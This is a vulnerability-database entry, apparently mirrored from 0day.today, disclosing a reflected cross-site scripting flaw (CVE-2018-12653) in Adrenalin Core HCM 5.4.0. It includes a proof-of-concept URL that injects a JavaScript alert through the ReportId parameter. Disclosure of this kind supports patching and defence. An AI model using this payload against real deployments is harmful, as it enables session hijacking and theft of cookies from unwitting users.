Lucene search

K
zdtCy83rl0gger1337DAY-ID-33517
HistoryNov 12, 2019 - 12:00 a.m.

Adrenalin Core HCM 5.4.0 - (ReportID) Reflected Cross-Site Scripting Vulnerability

2019-11-1200:00:00
Cy83rl0gger
0day.today
46

EPSS

0.001

Percentile

49.0%

Exploit for asp platform in category web applications

# Exploit Title: Adrenalin Core HCM 5.4.0 - 'ReportID' Reflected Cross-Site Scripting
# Exploit Author: Rishu Ranjan
# Vendor Homepage: https://www.myadrenalin.com/
# Software Link: https://www.myadrenalin.com/core-hcm/
# Version: 5.4.0 (REQUIRED)
# Tested on: NA
# CVE : CVE-2018-12653
# Type: webapps
# Platform: Multiple

# Description
# ====================
# A Reflected Cross Site Scripting (XSS) Vulnerability was discovered in
# Adrenalin Core HCM v5.4.0 HRMS Software. The user supplied input containing
# malicious JavaScript is echoed back as it is in JavaScript code in an HTML
# response.

URL
====================
https://
<HOST:PORT>/myadrenalin/RPT/SSRSDynamicEditReports.aspx?ReportId=109LWFREPORT.RDL15822%27%3balert(%22Reflected%20XSS%22)%2f%2f773&Export=0

Parameter
====================
ReportId

Attack Type
====================
Remote

CVE Impact Other
====================
Allows an attacker to input malicious JavaScript which can steal cookie,
redirect them to other malicious website, etc.

Reference
====================
https://nvd.nist.gov/vuln/detail/CVE-2018-12653
https://www.knowcybersec.com/2019/02/CVE-2018-12653-reflected-XSS.html

Discoverer
====================
Rishu Ranjan

#  0day.today [2019-12-04]  #

EPSS

0.001

Percentile

49.0%